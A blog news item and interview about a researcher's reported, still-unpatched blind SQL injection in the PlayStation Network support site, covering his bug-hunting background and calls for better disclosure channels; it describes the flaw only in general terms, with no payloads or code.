SQLi Vulnerability In Playstation Network Allows Access To User Data

Security researcher Aria Akhavan has identified the SQL injection vulnerability in PlayStation network website which allows an attacker to access user data. Akhavan had informed Sony two weeks ago, but the flaw is not fixed yet.

About The Attack
The attack uses a function on the support website of Sony. A manipulated parameter in the URL allows to show content of the SQL-Database directly in the browser.

Effect Hacking Contacted Security researcher Aria Akhavan and got an exclusive interview.

Aria Akhavan is a 20 year old Student from Vienna(Austria). He started Penetration testing 5 years ago. He had discovered vulnerabilities in ebay.com, Avast.com and lot of other websites.

Aria Akhavan

Effect Hacking : Explain the vulnerability you found in PlayStation network ?

Aria Akhavan  : The vulnerability is a Blind SQL Injection which allows me to use SQL Queries to get information out of the database.

Effect Hacking : Is it fixed ?

Aria Akhavan : Not yet.

Effect Hacking : Do you use any special tools ?

Aria Akhavan : The only tool I ever used was actually a special made text browser.

Effect Hacking : How long you are in bug hunting ?

Aria Akhavan : Actually I started reporting security vulnerabilities in July 2014 but I was actually in the background gathering my information for about 5 years.

Effect Hacking : What is your first finding , how did you feel at that time?

Aria Akhavan : My first finding which I actually reported was Trustedshops. If I remember right, this vulnerability was an SSRF and Cross Frame Scripting attack. The feeling was actually a mix of happiness and somehow sadness. I actually expected more security on websites which are that big.

Effect Hacking : How much have you earned so far from Bug hunting?

Aria Akhavan : Thats a good question. Actually, this is something I want to keep private.

Effect Hacking:  Do you have a website ?

Aria Akhavan : Actually I am working on one, I never thought I would reach a point where I would need one.

Effect Hacking: What vulnerabilities have you discovered so far in your career as a Bug Hunter?

Aria Akhavan : Well there are alot, but mainly the ones I liked the most have been: PlayStation ebay.com and Avast.com.

Effect Hacking: What is your future plans?

Aria Akhavan : Actually my future plan is to get people to wake up. People trust big companies way too much and don´t learn out of mistakes. That is the second time the play station networked could have leaked data. Why is there no place people can report something to? Also why isn´t there one single working e-mail address on the PlayStation site? Companies should also start letting Penetration testers have a look for bugs in their applications. My goals are just to accomplish a safer net.

No comments

Powered by Blogger.